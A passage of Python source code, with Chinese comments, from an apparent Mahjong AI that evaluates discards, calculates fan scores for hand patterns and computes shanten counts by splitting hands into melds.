baohuanyuan=node.baohuanyuan).fanDetect()\n # print fan.baohuanyuan\n score = fan * value\n # print t2tot3_dict[str([37,37])],T_SELFMO[MJ.convert_hex2index(37)]\n\n # 去重处理,当状态相同时,只考虑最后一张牌不同时对评估造成的影响,也就是最后摸到的牌其获取途径将会不同。\n # 此外,在进行评估时,还要考虑\n\n state = []\n state.append([node.AAA, node.ABC, node.jiang]) #\n state.append(node.taking_set)\n # print state, node.value,score,fan,node.baohuanyuan,node.fei_king\n # print state\n # state.append(node.score)\n # state = [node.AAA, node.ABC, node.jiang]\n # if state == [[[[1, 1, 1], [1, 1, 1], [37, 37, 37]], [[2, 3, 4]], [0, 0]], [37]]:\n # print node.value, value_\n if state not in self.discard_state[discard][0]:\n self.discard_state[discard][0].append(state)\n # self.discard_state[discard][1].append(node.taking_set)\n self.discard_state[discard][1].append(score)\n # else:\n # index = self.discard_state[discard][0].index(state)\n # if node.take not in 
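\n            # Editor's note (hedged sketch of the repeated-draw correction used in this method): needing n copies of one tile is rarer than independent draws suggest, so each extra copy scales the value by (left - n + 1) / (left - n + 2), and a path needing more copies than remain scores zero:\n            # def repeat_correction(left, n):\n            #     value = 1.0\n            #     while n > 1:\n            #         if left < n: return 0.0\n            #         value *= float(left - n + 1) / (left - n + 2)\n            #         n -= 1\n            #     return value\n            # assert repeat_correction(4, 2) == 0.75 and repeat_correction(1, 2) == 0.0\n            # 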
self.discard_state[discard][1][index]:\n # self.discard_state[discard][1][index].append(node.taking_set)\n # self.discard_state[discard][1][index].append(score)\n # self.discard_score[discard].append(state)\n elif node.children != []:\n for child in node.children:\n # value_ = value\n # if node.take == 0:\n\n # if child.take==0:\n\n # if child.take == -1 and (self.king_num == 0 or node.baohuanyuan):\n # if type(node.take) == list:\n # # print node.node_info()\n # index1 = MJ.convert_hex2index(node.take[0])\n # index2 = MJ.convert_hex2index(node.take[1])\n # value_ *= T_SELFMO[index1] * T_SELFMO[index2]\n # else:\n # node.node_info()\n # value_ *= T_SELFMO[MJ.convert_hex2index(node.take)]\n #\n # else:\n # value_ *= node.value\n\n self.calculate_path_expectation(node=child, discard=discard)\n\n def get_discard_score(self):\n t1 = time.time()\n self.generate_tree()\n t2 = time.time()\n for root in self.tree_dict:\n # if discard not in self.discard_score.keys():\n # self.discard_score[discard] = 0\n # if discard not in self.discard_state.keys():\n # if discard not in self.discard_state.keys():\n # self.discard_state[discard] = [[], []]\n # for root in self.tree_dict[discard]:\n self.calculate_path_expectation(root)\n t3 = time.time()\n # print(\"tree time:\", t2 - t1, \"value time:\", t3 - t2)\n state_num = 0\n for discard in self.discard_state.keys():\n if discard not in self.discard_score.keys():\n self.discard_score[discard] = 0\n # for score_list in self.discard_state[discard][1]:\n self.discard_score[discard] = sum(self.discard_state[discard][-1])\n state_num += len(self.discard_state[discard][-1])\n\n # print (\"discard_state\", self.discard_state)\n # print (\"discard_score\", self.discard_score)\n # print (\"leaf node \", self.node_num)\n # print (\"state_num\", state_num)\n # print (\"chang_num\", self.chang_num)\n return self.discard_score, self.discard_state\n\n\n'''\n番数计算类\n'''\n\n\nclass Fan():\n def __init__(self, kz, sz, jiang, fei_king=0, using_king=0, baohuanyuan=False):\n \"\"\"\n 初始化类变量\n :param kz: 刻子\n :param sz: 顺子\n :param jiang: 将\n :param node: 待检测的结点\n :param fei_king: 飞宝数\n \"\"\"\n self.kz = kz\n self.sz = sz\n self.jiang = jiang\n self.fei_king = fei_king\n self.using_king = using_king\n self.baohuanyuan = baohuanyuan\n self.mul = 2\n\n # 碰碰胡\n def pengPengHu(self):\n \"\"\"\n 碰碰胡检测\n 是否刻子树数达到4个\n :return: bool\n \"\"\"\n if len(self.kz) == 4:\n # if self.usingKing==0:\n return True\n else:\n return False\n\n # 宝还原 x2\n # def baoHuanYuan(self):\n #\n # if self.baohuanyuan:\n # return True\n # else:\n # return False\n\n # 清一色 x2\n def qingYiSe(self):\n \"\"\"\n 清一色检测\n 手牌为同一花色\n :return: bool\n \"\"\"\n # todo 宝吊无法检测清一色,因为将牌无法确定\n w = 0\n ti = 0\n to = 0\n z = 0\n # print self.kz + self.sz+ self.jiang\n for t in self.kz + self.sz + [self.jiang]:\n card = t[0]\n if card != 0:\n if card & 0xf0 == 0x00:\n w = 1\n elif card & 0xf0 == 0x10:\n ti = 1\n elif card & 0xf0 == 0x20:\n to = 1\n else:\n return False\n\n if w + ti + to <= 1:\n return True\n else:\n return False\n\n def fanDetect(self):\n \"\"\"\n 番数计算\n 基础分4分,通过调用上述的番种检测来增加基础分\n :return: int 番数\n \"\"\"\n fan_list = [0, 0, 0, 0, 0, 0, 0] # 碰碰胡,清一色,宝还原,宝吊1234\n # 基础分判定\n score = 4\n if self.pengPengHu():\n # print \"0\"\n score *= self.mul\n fan_list[0] = 1\n if self.using_king == 0 or self.baohuanyuan:\n score *= self.mul\n\n # score *= 2 # 碰碰胡再给2倍分\n\n # 翻倍机制\n # 飞宝 当可以宝吊时,将飞宝倍数得到提高\n # if 0 in self.jiang:\n # for i in range(self.fei_king):\n # score *= 2.5\n # else:\n if self.fei_king > 0:\n fan_list[2 + 
self.fei_king] = 1\n for i in range(self.fei_king):\n # print \"1\"\n\n score *= self.mul\n\n # # 宝还原 x2\n if self.baohuanyuan:\n # print score, self.baohuanyuan,self.jiang,\n # print \"2\"\n score *= self.mul\n fan_list[2] = 1\n\n # 清一色\n if self.qingYiSe():\n score *= self.mul\n fan_list[1] = 1\n # print \"3\"\n # 单吊 x2\n # 这里无法处理,宝吊需要吃碰杠吃碰杠处理\n # if score>16: #得分大于16时,分数评估提高\n # score*=1.5\n # print\n return score, fan_list\n\n\nclass Fan2():\n def __init__(self, kz, sz, jiang, node=None, fei_king=0, kingNum=0):\n \"\"\"\n 初始化类变量\n :param kz: 刻子\n :param sz: 顺子\n :param jiang: 将\n :param node: 待检测的结点\n :param fei_king: 飞宝数\n \"\"\"\n self.kz = kz\n self.sz = sz\n self.jiang = jiang\n self.baoHuanYuan = False\n self.noKing = True\n\n # self.usingKing=node.usingKing\n if node != None:\n self.feiKingNum = node.feiKingNum\n if node.baoHuanYuan + node.feiKingNum == kingNum:\n # self.NoKing=True\n if kingNum != 0 and node.baoHuanYuan != 0:\n self.baoHuanYuan = True\n else:\n self.noKing = False\n\n\n else:\n self.feiKingNum = fei_king\n\n # 碰碰胡\n def pengPengHu(self):\n \"\"\"\n 碰碰胡检测\n 是否刻子树数达到4个\n :return: bool\n \"\"\"\n if len(self.kz) == 4:\n # if self.usingKing==0:\n return True\n else:\n return False\n\n # 宝还原 x2\n # def baoHuanYuan(self):\n #\n # if self.baoHuanYuan:\n # return True\n # else:\n # return False\n\n # 清一色 x2\n def qingYiSe(self):\n \"\"\"\n 清一色检测\n 手牌为同一花色\n :return: bool\n \"\"\"\n cards = copy.copy(self.kz + self.sz)\n cards.append(self.jiang)\n w = 0\n ti = 0\n to = 0\n z = 0\n for card in cards:\n if card & 0xf0 == 0x00:\n w = 1\n elif card & 0xf0 == 0x10:\n ti = 1\n elif card & 0xf0 == 0x20:\n to = 2\n else:\n return False\n\n if w + ti + to + z <= 1:\n return True\n else:\n return False\n\n def fanDetect(self):\n \"\"\"\n 番数计算\n 基础分4分,通过调用上述的番种检测来增加基础分\n :return: int 番数\n \"\"\"\n # 基础分判定\n score = 4\n if self.pengPengHu():\n\n score = 8\n if self.noKing:\n score = 16\n\n # 翻倍机制\n # 飞宝\n for i in range(self.feiKingNum):\n score *= 2\n # # 宝还原 x2\n if self.baoHuanYuan:\n score *= 2\n # 单吊 x2\n # 这里无法处理,宝吊需要吃碰杠吃碰杠处理\n\n return score\n\n\n'''\n平胡类,相关处理方法\n分为手牌拆分模块sys_info,评估cost,出牌决策,吃碰杠决策等部分\n'''\n\n\nclass pinghu:\n '''\n '''\n\n def __init__(self, cards, suits, leftNum=[], discards=[], discards_real=[], discardsOp=[], round=0, remainNum=134,\n seat_id=0, kingCard=None, fei_king=0, op_card=0x00):\n \"\"\"\n 类变量初始化\n :param cards: 手牌 \n :param suits:副露\n :param leftNum:剩余牌数量列表\n :param discards:弃牌\n :param discards_real:实际弃牌\n :param discardsOp:场面副露\n :param round:轮数\n :param remainNum:牌墙剩余牌数量\n :param seat_id:座位号\n :param kingCard:宝牌\n :param fei_king:飞宝数\n :param op_card:动作操作牌\n \"\"\"\n cards.sort()\n self.cards = cards\n self.suits = suits\n self.discards = discards\n self.discards_real = discards_real\n self.discardsOp = discardsOp\n self.remainNum = remainNum\n self.leftNum = leftNum\n self.round = round\n self.seat_id = seat_id\n self.fei_king = fei_king\n # print ('self.leftNum',self.leftNum)\n if self.leftNum == []:\n leftNum, discardsList = trandfer_discards(discards, discardsOp, cards)\n self.leftNum = leftNum\n\n # self.fengWei = fengWei\n self.kingCard = kingCard\n self.preKingCard = pre_king(kingCard)\n self.op_card = op_card\n if kingCard != None:\n self.kingNum = cards.count(kingCard)\n else:\n self.kingNum = 0 # print('kingNum111',leftNum[convert_hex2index(self.kingCard)],self.cards)\n\n @staticmethod\n def get_effective_cards(dz_set=[]):\n \"\"\"\n 获取有效牌\n :param dz_set: 搭子集合 list [[]]\n :return: 有效牌 list []\n \"\"\"\n effective_cards = []\n for dz 
in dz_set:\n if len(dz) == 1:\n effective_cards.append(dz[0])\n elif dz[1] == dz[0]:\n effective_cards.append(dz[0])\n elif dz[1] == dz[0] + 1:\n if int(dz[0]) & 0x0F == 1:\n effective_cards.append(dz[0] + 2)\n elif int(dz[0]) & 0x0F == 8:\n effective_cards.append((dz[0] - 1))\n else:\n effective_cards.append(dz[0] - 1)\n effective_cards.append(dz[0] + 2)\n elif dz[1] == dz[0] + 2:\n effective_cards.append(dz[0] + 1)\n effective_cards = set(effective_cards) # set 和list的区别?\n return list(effective_cards)\n\n def get_effective_cards_w(self, dz_set=[], left_num=[]):\n \"\"\"\n 有效牌及其概率获取\n :param dz_set: 搭子集合 list[[]],剩余牌 []\n :param left_num: 有效牌集合[], 有效牌概率 []\n :return:\n \"\"\"\n cards_num = self.remainNum\n effective_cards = []\n w = []\n for dz in dz_set:\n if dz[1] == dz[0]:\n effective_cards.append(dz[0])\n # if dz[0]>=0x31 and dz[0]<=0x37 and left_num[translate16_33(dz[0])]>0:#添加字牌权重\n # w.append(float((left_num[translate16_33(dz[0])]+0.5) * w_aa) / cards_num)\n # else:\n w.append(float(\n left_num[translate16_33(dz[0])]) / cards_num * w_aa) # 修改缩进,发现致命错误panic 忘了写float,这里写6是因为评估函数计算的缺陷\n\n elif dz[1] == dz[0] + 1:\n if int(dz[0]) & 0x0F == 1:\n effective_cards.append(dz[0] + 2)\n w.append(float(left_num[translate16_33(dz[0] + 2)]) / cards_num * w_ab)\n elif int(dz[0]) & 0x0F == 8:\n effective_cards.append((dz[0] - 1))\n w.append(float(left_num[translate16_33(dz[0] - 1)]) / cards_num * w_ab)\n else:\n effective_cards.append(dz[0] - 1)\n effective_cards.append(dz[0] + 2)\n w.append(float(left_num[translate16_33(dz[0] - 1)] + left_num[\n translate16_33(dz[0] + 2)]) / cards_num * w_ab)\n elif dz[1] == dz[0] + 2:\n effective_cards.append(dz[0] + 1)\n w.append(float(left_num[translate16_33(int(dz[0]) + 1)]) / cards_num * w_ab)\n return effective_cards, w\n\n @staticmethod\n def split_type_s(cards=[]):\n \"\"\"\n 功能:手牌花色分离,将手牌分离成万条筒字各色后输出\n :param cards: 手牌 []\n :return: 万,条,筒,字 [],[],[],[]\n \"\"\"\n cards_wan = []\n cards_tiao = []\n cards_tong = []\n cards_zi = []\n for card in cards:\n if card & 0xF0 == 0x00:\n cards_wan.append(card)\n elif card & 0xF0 == 0x10:\n cards_tiao.append(card)\n elif card & 0xF0 == 0x20:\n cards_tong.append(card)\n elif card & 0xF0 == 0x30:\n cards_zi.append(card)\n return cards_wan, cards_tiao, cards_tong, cards_zi\n\n @staticmethod\n def get_32N(cards=[]):\n \"\"\"\n 功能:计算所有存在的手牌的3N与2N的集合,例如[3,4,5] ,将得到[[3,4],[3,5],[4,5],[3,4,5]]\n 思路:为减少计算量,对长度在12张以上的单花色的手牌,当存在顺子时,不再计算搭子\n :param cards: 手牌 []\n :return: 3N与2N的集合 [[]]\n \"\"\"\n cards.sort()\n kz = []\n sz = []\n aa = []\n ab = []\n ac = []\n lastCard = 0\n # 对长度在12张以上的单花色的手牌,当存在顺子时,不再计算搭子\n if len(cards) >= 12:\n for card in cards:\n if card == lastCard:\n continue\n else:\n lastCard = card\n if cards.count(card) >= 3:\n kz.append([card, card, card])\n elif cards.count(card) >= 2:\n aa.append([card, card])\n if card + 1 in cards and card + 2 in cards:\n sz.append([card, card + 1, card + 2])\n else:\n if card + 1 in cards:\n ab.append([card, card + 1])\n if card + 2 in cards:\n ac.append([card, card + 2])\n else:\n for card in cards:\n if card == lastCard:\n continue\n else:\n lastCard = card\n if cards.count(card) >= 3:\n kz.append([card, card, card])\n if cards.count(card) >= 2:\n aa.append([card, card])\n if card + 1 in cards and card + 2 in cards:\n sz.append([card, card + 1, card + 2])\n if card + 1 in cards:\n ab.append([card, card + 1])\n if card + 2 in cards:\n ac.append([card, card + 2])\n return kz + sz + aa + ab + ac\n\n # 判断32N是否存在于cards中\n @staticmethod\n def in_cards(t32=[], cards=[]):\n \"\"\"\n 
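Editor's doctest-style example (a sketch; plain ints stand in for tile codes):\n        >>> pinghu.in_cards(t32=[3, 4], cards=[3, 4, 5])\n        True\n        >>> pinghu.in_cards(t32=[3, 9], cards=[3, 4, 5])\n        False\n\n        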
判断32N是否存在于cards中\n :param t32: 3N或2N组合牌\n :param cards: 本次判断的手牌\n :return: bool\n \"\"\"\n for card in t32:\n if card not in cards:\n return False\n return True\n\n def extract_32N(self, cards=[], t32_branch=[], t32_set=[]):\n \"\"\"\n 功能:递归计算手牌的所有组合信息,并存储在t32_set,\n 思路: 每次递归前检测是否仍然存在32N的集合,如果没有则返回出本此计算的结果,否则在手牌中抽取该32N,再次进行递归\n :param cards: 手牌\n :param t32_branch: 本次递归的暂存结果\n :param t32_set: 所有组合信息\n :return: 结果存在t32_set中\n \"\"\"\n t32N = self.get_32N(cards=cards)\n\n if len(t32N) == 0:\n t32_set.extend(t32_branch)\n # t32_set.extend([cards])\n t32_set.append(0)\n t32_set.extend([cards])\n else:\n for t32 in t32N:\n if self.in_cards(t32=t32, cards=cards):\n cards_r = copy.copy(cards)\n for card in t32:\n cards_r.remove(card)\n t32_branch.append(t32)\n self.extract_32N(cards=cards_r, t32_branch=t32_branch, t32_set=t32_set)\n if len(t32_branch) >= 1:\n t32_branch.pop(-1)\n\n def tree_expand(self, cards):\n \"\"\"\n 功能:对extract_32N计算的结果进行处理同一格式,计算万条筒花色的组合信息\n 思路:对t32_set的组合信息进行格式统一,分为[kz,sz,aa,ab,xts,leftCards]保存,并对划分不合理的地方进行过滤,例如将345划分为35,4为废牌的情况\n :param cards: cards [] 万条筒其中一种花色手牌\n :return: allDeWeight [kz,sz,aa,ab,xts,leftCards] 去除不合理划分情况的组合后的组合信息\n \"\"\"\n all = []\n t32_set = []\n self.extract_32N(cards=cards, t32_branch=[], t32_set=t32_set)\n kz = []\n sz = []\n t2N = []\n aa = []\n length_t32_set = len(t32_set)\n i = 0\n # for i in range(len(t32_set)):\n while i < length_t32_set:\n t = t32_set[i]\n flag = True # 本次划分是否合理\n if t != 0:\n if len(t) == 3:\n\n if t[0] == t[1]:\n kz.append(t)\n else:\n sz.append(t) # print (sub)\n elif len(t) == 2:\n if t[1] == t[0]:\n aa.append(t)\n else:\n t2N.append(t)\n\n else:\n '修改,使计算时间缩短'\n leftCards = t32_set[i + 1]\n efc_cards = self.get_effective_cards(dz_set=t2N) # t2N中不包含aa\n # 去除划分不合理的情况,例如345 划分为34 或35等,对于333 划分为33 和3的情况,考虑有将牌的情况暂时不做处理\n for card in leftCards:\n if card in efc_cards:\n flag = False\n break\n\n if flag:\n all.append([kz, sz, aa, t2N, 0, leftCards])\n kz = []\n sz = []\n aa = []\n t2N = []\n i += 1\n i += 1\n\n allSort = [] # 给每一个元素排序\n allDeWeight = [] # 排序去重后\n\n for e in all:\n for f in e:\n if f == 0: # 0是xts位,int不能排序\n continue\n else:\n f.sort()\n allSort.append(e)\n\n for a in allSort:\n if a not in allDeWeight:\n allDeWeight.append(a)\n\n allDeWeight = sorted(allDeWeight, key=lambda k: (len(k[0]), len(k[1]), len(k[2])), reverse=True) # 居然可以这样排序!!\n return allDeWeight\n\n @staticmethod\n def zi_expand(cards=[]):\n \"\"\"\n 功能:计算字牌组合信息\n 思路:字牌组合信息需要单独计算,因为没有字顺子,迭代计算出各张字牌的2N和3N的情况,由于某些情况下,可能只会需要aa作为将牌的情况,同时需要刻子和aa的划分结果\n :param cards: 字牌手牌\n :return: ziBranch 字牌的划分情况 [kz,sz,aa,ab,xts,leftCards]\n \"\"\"\n cardList = []\n for i in range(7):\n cardList.append([])\n ziCards = [0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37]\n for card in ziCards:\n index = (card & 0x0f) - 1\n # print(index)\n\n if cards.count(card) == 4:\n # 此结构为[3N,2N,leftCards]\n cardList[index].append([[[card, card, card]], [], [], [], 0, [card]])\n elif cards.count(card) == 3:\n cardList[index].append([[[card, card, card]], [], [], [], 0, []])\n cardList[index].append([[], [], [[card, card]], [], 0, [card]])\n elif cards.count(card) == 2:\n\n cardList[index].append([[], [], [[card, card]], [], 0, []])\n elif cards.count(card) == 1:\n cardList[index].append([[], [], [], [], 0, [card]])\n else:\n cardList[index].append([[], [], [], [], 0, []])\n\n ziBranch = []\n for c1 in cardList[0]:\n for c2 in cardList[1]:\n for c3 in cardList[2]:\n for c4 in cardList[3]:\n for c5 in cardList[4]:\n for c6 in cardList[5]:\n for c7 in cardList[6]:\n branch = []\n for n in 
range(6):\n branch.append(c1[n] + c2[n] + c3[n] + c4[n] + c5[n] + c6[n] + c7[n])\n ziBranch.append(branch)\n return ziBranch\n\n def pengpengHu(self, outKingCards, suits, kingNum):\n \"\"\"\n 功能:碰碰胡检测\n 思路:计算碰碰胡的组合情况,只考虑kz和aa,当副露中存在sz时,返回[[],[],[],[],14,[]],其中xts为14表示不可能胡碰碰胡\n :param outKingCards: 去除宝牌后的手牌\n :param suits: 副露\n :param kingNum: 宝数量\n :return: all_PengPengHu 碰碰胡的组合情况\n \"\"\"\n all_PengPengHu = [[], [], [], [], 14, []]\n\n for suit in suits:\n if suit[0] != suit[1]:\n return []\n\n for card in set(outKingCards):\n\n if outKingCards.count(card) == 1:\n all_PengPengHu[-1].append(card)\n elif outKingCards.count(card) == 2:\n all_PengPengHu[2].append([card, card])\n elif outKingCards.count(card) == 3:\n all_PengPengHu[0].append([card, card, card])\n elif outKingCards.count(card) == 4:\n all_PengPengHu[0].append([card, card, card])\n all_PengPengHu[-1].append(card)\n all_PengPengHu = self.xts([all_PengPengHu], suits, kingNum)\n return all_PengPengHu\n\n @staticmethod\n def xts(all=[], suits=[], kingNum=0):\n \"\"\"\n 功能:计算组合的向听数\n 思路:初始向听数为14,减去相应已成型的组合(kz,sz为3,aa/ab为2,宝直接当1减去),当2N过剩时,只减去还需要的2N,对2N不足时,对还缺少的3N减去1,表示从孤张牌中选择一张作为3N的待选\n :param all: [[]]组合信息\n :param suits: 副露\n :param kingNum: 宝牌数量\n :return: all 计算向听数后的组合信息\n \"\"\"\n for i in range(len(all)):\n t3N = all[i][0] + all[i][1]\n all[i][4] = 14 - (len(t3N) + len(suits)) * 3\n # 有将牌\n has_aa = False\n if len(all[i][2]) > 0:\n has_aa = True\n\n if has_aa and kingNum == 0: # has do 当2N与3N数量小于4时,存在没有减去相应待填数,即废牌也会有1张作为2N或3N的待选位,\n # print()all_src\n if len(suits) + len(t3N) + len(all[i][2]) + len(all[i][3]) - 1 >= 4:\n\n all[i][4] -= (4 - (len(suits) + len(t3N))) * 2 + 2\n else:\n all[i][4] -= (len(all[i][2]) + len(all[i][3]) - 1) * 2 + 2 + 4 - (\n len(suits) + len(t3N) + len(all[i][2]) + len(all[i][3]) - 1) # 0717 17:24\n # 无将牌\n else:\n if len(suits) + len(t3N) + len(all[i][2]) + len(all[i][3]) >= 4:\n\n all[i][4] -= (4 - (len(suits) + len(t3N))) * 2 + 1\n\n else:\n all[i][4] -= (len(all[i][2]) + len(all[i][3])) * 2 + 1 + 4 - (\n len(suits) + len(t3N) + len(all[i][2]) + len(all[i][3]))\n all[i][4] -= kingNum\n if all[i][4] < 0:\n all[i][4] = 0\n all.sort(key=lambda k: (k[4], len(k[-1])))\n return all\n\n @staticmethod\n def is_related(card=[], ndCards=[]):\n \"\"\"\n 功能:判断孤张牌是否与次级废牌能成为搭子2N关系\n 思路:先计算该张废牌的相关牌为临近2张牌,判断其是否在次级废牌中ndCards\n :param card: 废牌\n :param ndCards: 次级废牌组合\n :return: bool\n \"\"\"\n if card > 0x30:\n return False\n relatedSet = [card - 2, card - 1, card, card + 1, card + 2]\n for card in relatedSet:\n if card in ndCards:\n return True\n return False\n\n def sys_info_V3(self, cards, suits, left_num=[4] * 34, kingCard=None):\n \"\"\"\n 功能:综合计算手牌的组合信息\n 思路:对手牌进行花色分离后,单独计算出每种花色的组合信息 ,再将其综合起来,计算每个组合向听数,最后输出最小向听数及其加一的组合\n :param cards: 手牌\n :param suits: 副露\n :param left_num: 剩余牌\n :param kingCard: 宝牌\n :return: 组合信息\n \"\"\"\n # 去除宝牌计算信息,后面出牌和动作决策再单独考虑宝牌信息\n if kingCard == None:\n kingCard = self.kingCard\n RM_King = copy.copy(cards)\n kingNum = 0\n if kingCard != None:\n kingNum = cards.count(kingCard)\n for i in range(kingNum):\n RM_King.remove(kingCard)\n\n # 特例,op操作计算胡牌概率时使用,在处理op_card是宝牌时,该宝牌只能作为宝还原使用\n if 0 not in cards and self.op_card == self.kingCard and len(cards) % 3 == 2:\n RM_King.append(self.kingCard)\n RM_King.sort()\n kingNum -= 1\n\n # 花色分离\n wan, tiao, tong, zi = self.split_type_s(RM_King)\n wan_expd = self.tree_expand(cards=wan)\n tiao_expd = self.tree_expand(cards=tiao)\n tong_expd = self.tree_expand(cards=tong)\n zi_expd = self.zi_expand(cards=zi)\n\n all = []\n for i in wan_expd:\n for j 
in tiao_expd:\n                for k in tong_expd:\n                    for m in zi_expd:\n                        branch = []\n                        # 将每种花色的4个字段合并成一个字段\n                        for n in range(6):\n                            branch.append(i[n] + j[n] + k[n] + m[n])\n                        all.append(branch)\n\n
        # 将获取概率为0的组合直接丢弃到废牌中 todo 由于有宝,这里也可能会被宝代替\n        # 移到了出牌决策部分处理\n        # if len(cards) % 3 == 1 and self.kingNum <= 1:#这里只考虑出牌、宝做宝吊的情况\n        #     for a in all:\n        #         for i in range(len(a[3]) - 1, -1, -1):\n        #             ab = a[3][i]\n        #             efc = self.get_effective_cards([ab])\n        #             if sum([LEFT_NUM[MJ.convert_hex2index(e)] for e in efc]) == 0:\n        #                 a[3].remove(ab)\n        #                 a[-1].extend(ab)\n        #                 logger.info(\"remove rate 0 ab,%s,%s,%s,a=%s\",self.cards,self.suits,self.kingCard,a)\n\n
        # 对废牌区的牌都是与aa/ab区相联系时,将价值最低的ab丢弃到废牌区\n        # for a in all:\n        #     ndCards = []\n        #     for aa_ab in a[2] + a[3]:\n        #         ndCards.extend(aa_ab)\n        #     Flag = True\n        #     for card in a[-1]:\n        #         if not self.is_related(card, ndCards):\n        #             Flag = False\n        #             break\n        #     if Flag:\n        #         # print ('all are related',a[3])\n        #\n        #         for i in range(len(a[3]) - 1, -1, -1):\n        #             ab = a[3][i]\n        #             efc = self.get_effective_cards([ab])\n        #             if sum([left_num[convert_hex2index(e)] for e in efc]) <= 2:\n        #                 a[3].remove(ab)\n        #                 a[-1].extend(ab)\n\n
        # 计算向听数\n        # 计算拆分组合的向听数\n        all = self.xts(all, suits, kingNum)\n\n        # 获取向听数最小的all分支\n        min_index = 0\n        for i in range(len(all)):\n            if all[i][4] > all[0][4] + 1:  # xts+1以下的组合\n                min_index = i\n                break\n\n        if min_index == 0:  # 如果全部都匹配,则min_index没有被赋值,将min_index赋予all长度\n            min_index = len(all)\n\n        all = all[:min_index]\n        # print(\"all_terminal\", all)\n        return all\n\n
    def left_card_weight_bak(self, card, left_num):\n        \"\"\"\n        功能:对废牌组合中的每张废牌进行评估,计算其成为3N的概率\n        思路:每张牌成为3N可分为两步:先成为搭子,再成为3N。成为搭子的牌必须自己摸到,而成为kz,sz可以通过吃碰。刻子为获取2张相同的牌,顺子为其邻近的2张牌\n        :param card: 孤张牌\n        :param left_num: 剩余牌\n        :return: 评估值\n        \"\"\"\n        if self.remainNum == 0:\n            remainNum = 1\n        else:\n            remainNum = self.remainNum\n        # remainNum = 1\n        i = convert_hex2index(card)\n        # d_w = 0\n\n        if left_num[i] == self.remainNum:\n            sf = float(self.leftNum[i]) / remainNum * 6\n        else:\n            sf = float(left_num[i]) / remainNum * float((left_num[i] - 1)) / remainNum * 6\n        if card >= 0x31:  # kz概率\n            # todo if card == fengwei:\n            # if card >= 0x35 and left_num[i] >= 2:\n            #     d_w = left_num[i] * left_num[i] * 2  # bug 7.22 修正dw-d_w\n            # else:\n            d_w = sf  # 7.22 16:35 去除字牌\n        elif card % 16 == 1:  # 11+23\n            d_w = sf + float(left_num[i + 1]) / remainNum * float(left_num[i + 2]) / remainNum * 2\n        elif card % 16 == 2:  # 22+13+3(14)+43 222 123 234\n            d_w = sf + float(left_num[i - 1]) / remainNum * float(left_num[i + 1]) / remainNum * 2 + float(\n                left_num[i + 1]) / remainNum * float(left_num[\n                i + 2]) / remainNum * 2  # d_w = left_num[i - 1] + left_num[i] * 3 + left_num[i + 1] * 2 + left_num[i + 2]\n        elif card % 16 == 8:  # 888 678 789\n            d_w = sf + float(left_num[i - 2]) / remainNum * float(left_num[i - 1]) / remainNum * 2 + float(\n                left_num[i - 1]) / remainNum * float(left_num[\n                i + 1]) / remainNum * 2  # d_w = left_num[i - 2] + left_num[i - 1] * 2 + left_num[i] * 3 + left_num[i + 1]\n        elif card % 16 == 9:  # 999 789\n            d_w = sf + float(left_num[i - 2]) / remainNum * float(left_num[\n                i - 1]) / remainNum * 2  # d_w = left_num[i - 2] + left_num[i - 1] + left_num[i] * 3  # 删除多添加的×2\n        else:  # 555 345 456 567\n            # print (left_num)\n            d_w = sf + float(left_num[i - 2]) / remainNum * float(left_num[i - 1]) / remainNum * 2 + float(\n                left_num[i - 1]) / remainNum * float(left_num[i + 1]) / remainNum * 2 + float(\n                left_num[i + 1]) / remainNum * float(left_num[\n                i + 2]) / remainNum * 2\n        # print(\"i=\", i, d_w)\n        return d_w\n\n    def left_card_weight(self, card, left_num, 
need_jiang=False):\n \"\"\"\n 功能:对废牌组合中的每张废牌进行评估,计算其成为3N的概率\n 思路:每张牌能成为3N的情况可以分为先成为搭子,在成为3N2步,成为搭子的牌必须自己摸到,而成为kz,sz可以通过吃碰。刻子为获取2张相同的牌,顺子为其邻近的2张牌\n :param card: 孤张牌\n :param left_num: 剩余牌\n :return: 评估值\n \"\"\"\n\n # if self.remainNum==0:\n # remainNum=1\n # else:\n # remainNum = self.remainNum\n # remainNum = 1\n i = convert_hex2index(card)\n\n if need_jiang:\n return left_num[i]\n # d_w = 0\n\n # if left_num[i] == self.remainNum:\n # sf = float(self.leftNum[i])\n # else:\n # sf = float(left_num[i]) / remainNum * float((left_num[i] - 1)) / remainNum * 6\n\n if left_num[i] > 1:\n aa = left_num[i] * (left_num[i] - 1) * 4\n else:\n aa = left_num[i]\n if card >= 0x31: # kz概率\n # todo if card == fengwei:\n # if card >= 0x35 and left_num[i] >= 2:\n # d_w = left_num[i] * left_num[i] * 2 # bug 7.22 修正dw-d_w\n # else:\n d_w = aa # 7.22 16:35 去除字牌\n elif card % 16 == 1: # 11+23\n d_w = aa + left_num[i + 1] * left_num[i + 2] * 2\n elif card % 16 == 2: # 22+13+3(14)+43 222 123 234\n d_w = aa + left_num[i - 1] * left_num[i + 1] * 2 + left_num[i + 1] * left_num[i + 2] * 2\n elif card % 16 == 8: # 888 678 789\n d_w = aa + left_num[i - 2] * left_num[i - 1] * 2 + left_num[i - 1] * left_num[i + 1] * 2\n elif card % 16 == 9: # 999 789\n d_w = aa + left_num[i - 2] * left_num[i - 1] * 2\n # 删除多添加的×2\n else: # 555 345 456 567\n # print (left_num)\n d_w = aa + left_num[i - 2] * left_num[i - 1] * 2 + left_num[i - 1] * left_num[i + 1] * 2 + left_num[i + 1] * \\\n left_num[\n i + 2] * 2\n # if card<=0x31:\n # if (card%0x0f==3 or card %0x0f==7): #给金3银7倍数\n # d_w*=1.5\n # elif card%0x0f==5:\n # d_w*=1.2\n # print(\"i=\", i, d_w)\n return d_w\n\n # t2N列表最后的aa\n @staticmethod\n def is_last_aa(t2N=[]):\n \"\"\"\n 在计算评估值时,用于判断是否是最后一个aa\n 判断剩余搭子集合中是否还存在aa对子\n :param t2N:搭子集合\n :return: bool\n \"\"\"\n for t in t2N:\n if t[0] == t[1]:\n return False\n return True\n\n def choose_n(self, t2N=[], n=0, rate=1, results=[], ab=False, abSet=[]):\n \"\"\"\n 采用递归的方式,计算所有可能的胡牌的2N组合情况\n 在t2N中选择n个作为有效2N\n :param t2N: 待选搭子集合\n :param n: 待选数量\n :param rate: 本条路径的胡牌概率\n :param results: 计算结果列表形式 []\n :param ab: 本条路径中是否有ab的搭子\n :param abSet: 所有路径中是否存在ab的集合\n :return:\n \"\"\"\n if n == 0:\n results.append(rate)\n abSet.append(ab)\n return\n n_ = copy.copy(n)\n n_ -= 1\n for t2 in t2N:\n t2NCopy = MJ.deepcopy(t2N)\n t2NCopy.remove(t2)\n rate_ = copy.copy(rate)\n rate_ *= t2[2]\n if t2[0] != t2[1] or ab:\n ab_ = True\n else:\n 